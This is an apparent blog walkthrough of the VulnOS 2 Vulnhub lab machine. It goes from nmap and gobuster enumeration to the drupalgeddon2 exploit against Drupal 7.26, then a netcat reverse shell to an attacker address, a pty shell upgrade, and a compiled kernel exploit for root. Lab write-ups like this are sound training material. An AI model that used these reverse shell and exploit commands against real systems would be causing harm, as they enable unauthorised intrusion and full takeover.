VulnOS 2 Writeup and Walkthough (Vulnhub)

Erictee
3 min readAug 21, 2021

--

VulnOS 2 can be downloaded in https://www.vulnhub.com/entry/vulnos-2,147/ if you guys want to practice along.

First, scan the network to find out the IP address.

nmap 192.168.10.113

Perform port scanning and 2 ports were found open on target machine.

Perform thorough scan with nmap to find out more information.

nmap -sC -sV -p22,80 -oN tcp_scan

Perform port scanning and version discovery on the machine. 2 ports were found open on target machine.

Visit the website that the target machine hosted. The “website” is embedded with another website link that take us to “/jabc/” directory.

gobuster dir -u http://192.168.10.113 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -x php,txt

Perform directories brute forcing with gobuster and found robots.txt file present on the website.

robots.txt

Try to enumerate username and password but no avail.

Wappalyzer indicates that the website is running on Drupal version 7.

Inside standard.info, it reveals that the drupal version is 7.26.

Google Drupal version 7.26 exploit. Visit the third link which is from GitHub.

README.md
README.md

Download the drupalgeddon2.rb exploit and launch the attack on the target.

chmod +x drupal.rb

./drupal.rb http://192.168.10.113/jabc/

Follow the instruction in the GitHub and we got a reverse shell ! The shell granted cannot change directory for some reasons. Therefore, I launched another reverse shell to my attack machine with netcat.

nc 192.168.10.127 2324 -e “/bin/bash”

nc -lvnp 2324

Upgrade the granted shell with python.

python -c ‘import pty; pty.spawn(“/bin/bash”)’

Check the kernel version and search for any exploits online.

Save the exploit on the target system and compile the file with gcc.

gcc poc.c -o poc

Launched the exploit and we got root shell !

And that is it. Thanks for following through and I will see you in the future !

--

--